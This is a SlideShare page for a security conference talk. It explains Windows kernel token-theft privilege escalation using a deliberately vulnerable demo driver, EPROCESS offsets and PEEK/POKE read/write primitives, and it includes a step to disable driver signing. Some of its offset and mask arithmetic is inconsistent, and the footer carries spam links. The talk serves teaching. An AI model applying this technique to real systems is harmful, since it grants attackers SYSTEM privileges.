SlideShare a Scribd company logo

0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft

Download as PPTX, PDF
R
Russell Sanford

A low level walkthrough of exploiting creation utilizing Token Theft Privilege Esc techniques by utilizing WRITE-WHAT-WHERE/READ-WHAT-WHERE exploit primitives (Including Demo Vulnerable Driver and Userland Exploit Tools)

Software
1 of 42
Windows Privilege Escalation Russell Sanford xort @ sploit.online A Low-Level Explanation of Token Theft
What Were Covering: • KPRCB structure • ETHREAD structure • EPROCESS structures • ActiveProcessLinks • Locating SYSTEM’s EPROCESS structure from Userland • Stealing SYSTEM’s TOKEN and patching them over our process’ EPROCESS for Priv Esc • Read / Write Primitives Extra Fun - Interactive Learning Exploit! • DHA_Vuln_Driver_RW_Primitive.sys • DHA_Userland_Exploit_PEEKPOKE.exe • DHA_Userland_Find_SYSTEM_EPROCESS.exe • DHA_PrivEsc_Demo.py Windows Privilege Escalation Token Theft @ A Low-Level WOOHOO!
Goals of this presentation • Explain how Token Theft Privilege Escalation Work • Explain what Read-What-Where and Write-What-Where primitives are • Provide you with a simplified vulnerable target driver and tool to exploit the driver to practice with • Walk through exploiting our demo kernel vulnerability Windows Privilege Escalation Token Theft @ A Low-Level
Before we start… A quick note on pointers and memory addressing Windows Privilege Escalation Token Theft @ A Low-Level
Windows Privilege Escalation Token Theft @ A Low-Level What's this ‘pointer’ you speak of? A pointer is a variable that stores the address of another variable. Its an address stored at an address that points to somewhere else. In the example above, the POINTER located at address 0x7fff98b499e8 POINTS to address 0x7fffa0757dd4 which is where the Variable with the value “10” is located.
Setup : The Code Windows Privilege Escalation Token Theft @ A Low-Level
Setup : The Code • I’ve provided compiled versions of the kernel driver, the executables used to exploit them, and scripted exploit. Compiled Binaries and Source Codes: http://sploit.online/0x2_KernelTalks_TokenTheftPrivEsc/ • If you don’t trust the code – or just wish to analyze it – the source has been provided as well. • To compile the code, you will need Visual Studio as well as the Windows SDK and WDK. Instructions for installing these prerequisites can all be found here: https://learn.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk Windows Privilege Escalation Token Theft @ A Low-Level
Windows Privilege Escalation Token Theft @ A Low-Level 1 2 3 Setup : Loading the DHA_VulnDriver with OSR Driver Loader 1) Select BROWSE to select the Driver 2) Select Register Service ( All Windows Drivers must have a entry in the Registry in order to load ) 3) Select Start Service * ALTERNATIVELY, you could use an unsigned driver loader like KDU :D :D
Windows Privilege Escalation Token Theft @ A Low-Level + SHIFT Press F7 Select Startup Settings Select Restart In order to load The vulnerable Driver, you must first Disable Driver Signature Enforcement! 1 2 3 4 SETUP: DISABLE DRIVER SIGNING
Windows Internal Structures for Process Management Windows Privilege Escalation Token Theft @ A Low-Level
Windows Internals: KPRCB structure The name KPRCB stands for (Kernel) Processor Control Block. The kernel keeps one for each logical processor as the last member of the processor’s KPCR. The KPRCB (formally _KPRCB) holds most of what the kernel needs ready access to while managing a processor and while managing resources that are themselves managed more simply and quickly per processor. The KPRCB structure’s CurrentThread pointer connects the structure to a _ETHREAD structure…. Windows Privilege Escalation Token Theft @ A Low-Level
Windows Internals: ETHREAD structure • The ETHREAD structure is the kernel’s representation of a thread object. • In the Windows Kernel it is accessed by referencing GS:0x188 • When writing Kernel Shellcode, this is the easiest entry point path to work your way to the EPROCESS list of linked structures <----- %gs:0x188 ( in assembly points here) Windows Privilege Escalation Token Theft @ A Low-Level
Windows Internals: EPROCESS structures Windows Privilege Escalation Token Theft @ A Low-Level • The EPROCESS structure is the kernel's representation of a process object. • Each running process has an associated EPROCESS structure that Windows Uses to keep track of it with.
A look inside an EPROCESS structure • The Actual structure is 2944 bytes in length and host a vast amount of information describing the running process such as the process’s name, Image Base Address of the loaded binary in Memory and a a whole lot more. • For this Exercise we’ll only be using 3 fields of this Lengthy and detailed structure: 1) UniqueProcessId (PID) 2) ActiveProcessLinks (Links to the next/previous EPROCESS structures) 3) Token (Security Token Assigned to process) 0:027> dt nt!_EPROCESS ntdll!_EPROCESS +0x000 Pcb : _KPROCESS ... +0x440 UniqueProcessId : Ptr64 Void +0x448 ActiveProcessLinks : _LIST_ENTRY ... +0x4b8 Token : _EX_FAST_REF ... ... +0x5a8 ImageFileName : [15] UChar ... +0xb70 MitigationFlags3Values : <unnamed-tag> 0:024> ?? sizeof(nt!_EPROCESS) unsigned int64 0xb80 Windows Privilege Escalation Token Theft @ A Low-Level
Walking EPROCESS structures using ActiveProcessLinks Windows Privilege Escalation Token Theft @ A Low-Level • Each EPROCESS structure contains a LIST_ENTRY substructure which is a pair of pointers known as ActiveProcessLinks • LIST_ENTRY structures are double-linked list that point to a identical structures both preceding/proceeding the current structure
Walking EPROCESS structures using ActiveProcessLinks Windows Privilege Escalation Token Theft @ A Low-Level • ActiveProcessLinks (LIST_ENTRY links) allow us to walk through a list of all the system’s EPROCESS structures – each of which representing a running process – in a circular manner – both forwards of backwards
Exploit Primitives Windows Privilege Escalation Token Theft @ A Low-Level
READ-WHAT-WHERE & WRITE WHAT WHERE Primitives READ-WHAT-WHERE – allows us to specify an address to a function and return the value stored at that location in memory WRITE-WHAT-WHERE – allows us to specify an address in memory along with a value to store at that location in memory * These terms are typically used when referring to kernel land vulnerabilities but also can be used in describing userland bugs Windows Privilege Escalation Token Theft @ A Low-Level
Data-Driven Attacks Due to VBS, HVCI, CI, DEP, Page Guard, and other mitigations the days of running executable shellcode are largely over with Data-Driven attacks involving modifying Process’ Handles, Structures, and Objects is still fair game. We can utilize Data-Driven Attacks to Escalate Privileges and get executable code to run (example: LOL Driver attacks) Windows Privilege Escalation Token Theft @ A Low-Level
Exploitation Tool Windows Privilege Escalation Token Theft @ A Low-Level
Windows Privilege Escalation Token Theft @ A Low-Level Keeping it old school - PEEK and POKE 
DHA_Userland_Exploit_PEEKPOKE.exe Windows Privilege Escalation Token Theft @ A Low-Level Allows for us to READ or WRITE to R/W Section of memory by offering Read- What-Where and Write- What-Where primitives to conduct Data-Driven attacks against the kernel. Usage: PEEK [address] POKE [address] [write-data] Operates with UINT64 variables
The Vulnerable Driver Windows Privilege Escalation Token Theft @ A Low-Level
Windows Privilege Escalation Token Theft @ A Low-Level DHA_Vuln_Driver_RW_Primitive.sys BSOD-free kernel fun ! • The vulnerable driver was compiled with Exception Handling to not allow illegal memory access attempts. • Normally, if you tried to access an unallocated, privately mapped, or illegal address you would cause an exception leading to something like…
The Privilege Escalation Attack – Step by Step Windows Privilege Escalation Token Theft @ A Low-Level
Locating SYSTEM’s EPROCESS structure from Userland DHA_Userland_Find_SYSTEM_EPROCESS.exe explained… (c++) STEP 1: Finding Windows Kernel Base Windows Privilege Escalation Token Theft @ A Low-Level • The EnumDeviceDrivers() function will populate a list of loaded system modules • The first entry [0] contains the loading address of ntosknrl.exe (windows kernel)
Locating SYSTEM’s EPROCESS structure from Userland DHA_Userland_Find_SYSTEM_EPROCESS.exe explained… (c++) STEP 2: Finding SYSTEM’s EPROCCESS structure offset Windows Privilege Escalation Token Theft @ A Low-Level • We use LoadLibraryA() to load ntoskrnl.exe (Normally used for DLL’s – but .EXE, .SYS, and .DLL are the same PE file format • We use GetProcAddress() to find the export for PsInitialSystemProcess (EPROCESS pointer offset) ( GetProcAddress() is normally used to look up function addresses – but what it’s ACTUALLY doing is looking up EXPORT names/addresses  ) • We Add Kernelbase + PsInitialSystemProcess together for pointer to EPROCESS in memory
Locating SYSTEM’s EPROCESS structure from Userland STEP 1 & 2: Finding SYSTEM’s EPROCCESS structure offset Note: KERNELBASE + OFFSET == POINTER to SYSTEM EPROCESS Structure (#4) STEP3: Resolve the POINTER to SYSTEM’s EPROCESS structure Now we have the location of SYSTEM’s EPROCESS structure and have entered the double-linked list of EPROCESS structures! ADDRESS: 0xffff848b9eafd040 Windows Privilege Escalation Token Theft @ A Low-Level
Let’s Verify we have SYSTEM’s EPROCESS structure SYSTEM’s EPROCESS structure ALWAYS has a PID of #4 Windows Privilege Escalation Token Theft @ A Low-Level EPROCESS Structure offsets UniqueProcessId = 0x440 # PVOID ActiveProcessLinks = 0x448 # LIST_ENTRY Token = 0x4b8 # PVOID EPROCESS ADDRESS = 0xffff848b9eafd040 UniqueProcessId = 0x440 0xffff848b9eafd040 + 0x440 = 0xffff848b9eafd480 YEP That’s SYSTEM!
Let’s steal SYSTEM’s EPROCESS structure’s security Token ! Windows Privilege Escalation Token Theft @ A Low-Level EPROCESS Structure offsets UniqueProcessId = 0x440 # PVOID ActiveProcessLinks = 0x448 # LIST_ENTRY Token = 0x4b8 # PVOID EPROCESS ADDRESS = 0xffff848b9eafd040 Token = 0x4b8 0xffff848b9eafd040 + 0x440 = 0xffff848b9eafd4f8 SYSTEM_TOKEN = 0xffffbe87f081e62f
Let’s adjust our recovered SYSTEM EPROCESS Token for use Windows Privilege Escalation Token Theft @ A Low-Level All Windows internal OBJECTs have an attached ‘Reference Count’ (Ref Cnt) number to keep copies of different instances of use of an object. Were going to remove the Reference Count from the Token for our purposes This simply means removing the lower 3 bits of our recovered token by using a logical AND operation with the value 0xfffffffffffffff8 SYSTEM_TOKEN = 0xFFFFBE87F081E62F (BEFORE) & 0xFFFFFFFFFFFFFFF7 = SYSTEM_TOKEN = 0xFFFFBE87F081E628 (AFTER) * in this instance the lower 0xF (1111) becomes 0x8 (1000)
Windows Privilege Escalation Token Theft @ A Low-Level Let’s walk the EPROCESS list’s connecting LIST_ENTRYs Remember, Each Link in a LIST_ENTRY structure just points to the next link (Flink/Blink) 0xffff848b9eb90488 0xffff848b9ebe2488 0xffff848ba0fda488
Let’s walk the EPROCESS list’s connecting LIST_ENTRYs to find our process’ PID Windows Privilege Escalation Token Theft @ A Low-Level We Add the ActiveProcessLinks offset of +0x448 to the location address of SYSTEM’s EPROCESS structure and dereference (PEEK) the address there to enter the double linked list The LOOP: We check (PEEK) the value of ADDRESS – 0x8 to see if is equal to our PID If not: we (PEEK) the address of the last address returned to walk the list forward
Ounce we find our PID lets copy SYSTEM’s Token over Ours Windows Privilege Escalation Token Theft @ A Low-Level Note: The difference between the UniqueProcessID offset and Token offsets is 0x78 bytes At this location we write our stolen Token using the POKE command supplying the address of our PID’s Token to write to and the SYSTEM Token value
Demo Exploit Automating the Attack Windows Privilege Escalation Token Theft @ A Low-Level
Windows Privilege Escalation Token Theft @ A Low-Level Demo Exploit Module DHA_PrivEsc_Demo.py
Windows Privilege Escalation Token Theft @ A Low-Level
Final Notes on Professional Exploitation Windows Privilege Escalation Token Theft @ A Low-Level
Windows Privilege Escalation Token Theft @ A Low-Level Final notes on writing Profession Exploits… The EPROESS Structure is what’s known as an “Opaque structure” basically meaning – it’s meant to be internal and is subject to change in it’s layout. The EPROCESS structure has changed many times in the last few versions of windows. Offset changes can be observed in the structure here: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/eprocess/index.htm In writing a professional exploit a exploit author would detect the OS version and adjust to ensure these offsets match the version of the target OS and that the exploit could be versatile if affecting multiple versions of the Operating system
Windows Privilege Escalation Token Theft @ A Low-Level Final notes on writing Profession Exploits… To keep some of the math basic I explained to you that PID could be found 8 bytes behind ActiveProcessLink’s LIST_ENTRY structure when walking EPROCESS structures. A more structured exploit would have deducted the length of ActiveProcessLinks from the ActiveProcessLink location to find the actual beginning of the EPROCESS structure then use the offset values from the base of the structure. This is the more elegant approach and makes exploits easier to port to multiple versions of an OS and utilizes offsets more recognizable to other researchers vs our this-8=PID styled tricks used. 
Next Talk: Exploiting LOLDriver Vulnerabilities DC214 – 7.13.23 Windows Privilege Escalation Token Theft @ A Low-Level
Thanks! Russell Sanford xort@sploit.online Windows Privilege Escalation Token Theft @ A Low-Level

Recommended

0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory MayhemRussell Sanford
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalationnullthreat
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat Security Conference
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
0x01 - Breaking into Linux VMs for Fun and Profit
0x01 - Breaking into Linux VMs for Fun and Profit0x01 - Breaking into Linux VMs for Fun and Profit
0x01 - Breaking into Linux VMs for Fun and ProfitRussell Sanford
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Linux privilege escalation 101
Linux privilege escalation 101Linux privilege escalation 101
Linux privilege escalation 101Rashid feroz
 

Recommended

0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory Mayhem0x003 - Exploiting LOLDrivers - Physical Memory Mayhem
0x003 - Exploiting LOLDrivers - Physical Memory MayhemRussell Sanford
 
Fundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege EscalationFundamentals of Linux Privilege Escalation
Fundamentals of Linux Privilege Escalationnullthreat
 
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat v18 || Return of the kernel rootkit malware (on windows 10)
BlueHat v18 || Return of the kernel rootkit malware (on windows 10)BlueHat Security Conference
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
0x01 - Breaking into Linux VMs for Fun and Profit
0x01 - Breaking into Linux VMs for Fun and Profit0x01 - Breaking into Linux VMs for Fun and Profit
0x01 - Breaking into Linux VMs for Fun and ProfitRussell Sanford
 
File upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorFile upload-vulnerability-in-fck editor
File upload-vulnerability-in-fck editorPaolo Dolci
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Linux privilege escalation 101
Linux privilege escalation 101Linux privilege escalation 101
Linux privilege escalation 101Rashid feroz
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationAlienVault
 
Alphorm.com Formation Forensic sur Android
Alphorm.com Formation Forensic sur AndroidAlphorm.com Formation Forensic sur Android
Alphorm.com Formation Forensic sur AndroidAlphorm
 
Description of GRUB 2
Description of GRUB 2Description of GRUB 2
Description of GRUB 2iamumr
 
Life of a CVE
Life of a CVELife of a CVE
Life of a CVEYadnyawalkya Tale
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Modern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and TechniquesModern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and TechniquesMichael Scovetta
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionBlueinfy Solutions
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
Kernel Debugging & Profiling
Kernel Debugging & ProfilingKernel Debugging & Profiling
Kernel Debugging & ProfilingAnil Kumar Pugalia
 
BadUSB — On accessories that turn evil by Karsten Nohl
BadUSB — On accessories that turn evil by Karsten NohlBadUSB — On accessories that turn evil by Karsten Nohl
BadUSB — On accessories that turn evil by Karsten NohlPriyanka Aash
 
Course 102: Lecture 1: Course Overview
Course 102: Lecture 1: Course Overview Course 102: Lecture 1: Course Overview
Course 102: Lecture 1: Course Overview Ahmed El-Arabawy
 
iOS Application Penetration Testing
iOS Application Penetration TestingiOS Application Penetration Testing
iOS Application Penetration Testingn|u - The Open Security Community
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflowBach Khoa Da Nang
 
Testing UAC on Windows 10
Testing UAC on Windows 10Testing UAC on Windows 10
Testing UAC on Windows 10ErnestoFernndezProve
 
Ethical hacking mind map
Ethical hacking mind mapEthical hacking mind map
Ethical hacking mind mapdasdwwe1
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
 
Containers what are they, and why are they important v2.1
Containers what are they, and why are they important v2.1Containers what are they, and why are they important v2.1
Containers what are they, and why are they important v2.1Derrick Wippler
 

More Related Content

What's hot

Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationAlienVault
 
Alphorm.com Formation Forensic sur Android
Alphorm.com Formation Forensic sur AndroidAlphorm.com Formation Forensic sur Android
Alphorm.com Formation Forensic sur AndroidAlphorm
 
Description of GRUB 2
Description of GRUB 2Description of GRUB 2
Description of GRUB 2iamumr
 
Modern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and TechniquesModern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and TechniquesMichael Scovetta
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionBlueinfy Solutions
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Securitycclark_isec
 
BadUSB — On accessories that turn evil by Karsten Nohl
BadUSB — On accessories that turn evil by Karsten NohlBadUSB — On accessories that turn evil by Karsten Nohl
BadUSB — On accessories that turn evil by Karsten NohlPriyanka Aash
 
Course 102: Lecture 1: Course Overview
Course 102: Lecture 1: Course Overview Course 102: Lecture 1: Course Overview
Course 102: Lecture 1: Course Overview Ahmed El-Arabawy
 
Ethical hacking mind map
Ethical hacking mind mapEthical hacking mind map
Ethical hacking mind mapdasdwwe1
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
 

What's hot (20)

File inclusion
File inclusionFile inclusion
File inclusion
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM Installation
 
Alphorm.com Formation Forensic sur Android
Alphorm.com Formation Forensic sur AndroidAlphorm.com Formation Forensic sur Android
Alphorm.com Formation Forensic sur Android
 
Description of GRUB 2
Description of GRUB 2Description of GRUB 2
Description of GRUB 2
 
Life of a CVE
Life of a CVELife of a CVE
Life of a CVE
 
LFI to RCE
LFI to RCELFI to RCE
LFI to RCE
 
Modern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and TechniquesModern Kernel Pool Exploitation: Attacks and Techniques
Modern Kernel Pool Exploitation: Attacks and Techniques
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal Injection
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
Kernel Debugging & Profiling
Kernel Debugging & ProfilingKernel Debugging & Profiling
Kernel Debugging & Profiling
 
BadUSB — On accessories that turn evil by Karsten Nohl
BadUSB — On accessories that turn evil by Karsten NohlBadUSB — On accessories that turn evil by Karsten Nohl
BadUSB — On accessories that turn evil by Karsten Nohl
 
Course 102: Lecture 1: Course Overview
Course 102: Lecture 1: Course Overview Course 102: Lecture 1: Course Overview
Course 102: Lecture 1: Course Overview
 
iOS Application Penetration Testing
iOS Application Penetration TestingiOS Application Penetration Testing
iOS Application Penetration Testing
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Testing UAC on Windows 10
Testing UAC on Windows 10Testing UAC on Windows 10
Testing UAC on Windows 10
 
Ethical hacking mind map
Ethical hacking mind mapEthical hacking mind map
Ethical hacking mind map
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
 

Similar to 0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft

NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
 
Containers what are they, and why are they important v2.1
Containers what are they, and why are they important v2.1Containers what are they, and why are they important v2.1
Containers what are they, and why are they important v2.1Derrick Wippler
 
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...44CON
 
Containers - (Austin Cloud Meetup April 2016)
Containers - (Austin Cloud Meetup April 2016)Containers - (Austin Cloud Meetup April 2016)
Containers - (Austin Cloud Meetup April 2016)Derrick Wippler
 
[2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법
[2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법[2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법
[2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법GangSeok Lee
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2Royce Davis
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
Oleksyk applied-anti-forensics
Oleksyk applied-anti-forensicsOleksyk applied-anti-forensics
Oleksyk applied-anti-forensicsDefconRussia
 
Windows内核技术介绍
Windows内核技术介绍Windows内核技术介绍
Windows内核技术介绍jeffz
 
Introduction Linux Device Drivers
Introduction Linux Device DriversIntroduction Linux Device Drivers
Introduction Linux Device DriversNEEVEE Technologies
 
CNIT 126 12: Covert Malware Launching
CNIT 126 12: Covert Malware LaunchingCNIT 126 12: Covert Malware Launching
CNIT 126 12: Covert Malware LaunchingSam Bowne
 
Chromium os architecture report
Chromium os architecture reportChromium os architecture report
Chromium os architecture reportAmr Abd El Latief
 
24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAsKellyn Pot'Vin-Gorman
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access darkRoyce Davis
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012DefCamp
 

Similar to 0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft (20)

NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
 
Containers what are they, and why are they important v2.1
Containers what are they, and why are they important v2.1Containers what are they, and why are they important v2.1
Containers what are they, and why are they important v2.1
 
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
 
Containers - (Austin Cloud Meetup April 2016)
Containers - (Austin Cloud Meetup April 2016)Containers - (Austin Cloud Meetup April 2016)
Containers - (Austin Cloud Meetup April 2016)
 
[2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법
[2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법[2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법
[2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
Oleksyk applied-anti-forensics
Oleksyk applied-anti-forensicsOleksyk applied-anti-forensics
Oleksyk applied-anti-forensics
 
Windows内核技术介绍
Windows内核技术介绍Windows内核技术介绍
Windows内核技术介绍
 
Introduction Linux Device Drivers
Introduction Linux Device DriversIntroduction Linux Device Drivers
Introduction Linux Device Drivers
 
CNIT 126 12: Covert Malware Launching
CNIT 126 12: Covert Malware LaunchingCNIT 126 12: Covert Malware Launching
CNIT 126 12: Covert Malware Launching
 
Osquery
OsqueryOsquery
Osquery
 
Basics to Configure NW Device
Basics to Configure NW DeviceBasics to Configure NW Device
Basics to Configure NW Device
 
Chromium os architecture report
Chromium os architecture reportChromium os architecture report
Chromium os architecture report
 
24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
 
Docker dDessi november 2015
Docker dDessi november 2015Docker dDessi november 2015
Docker dDessi november 2015
 

Recently uploaded

Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
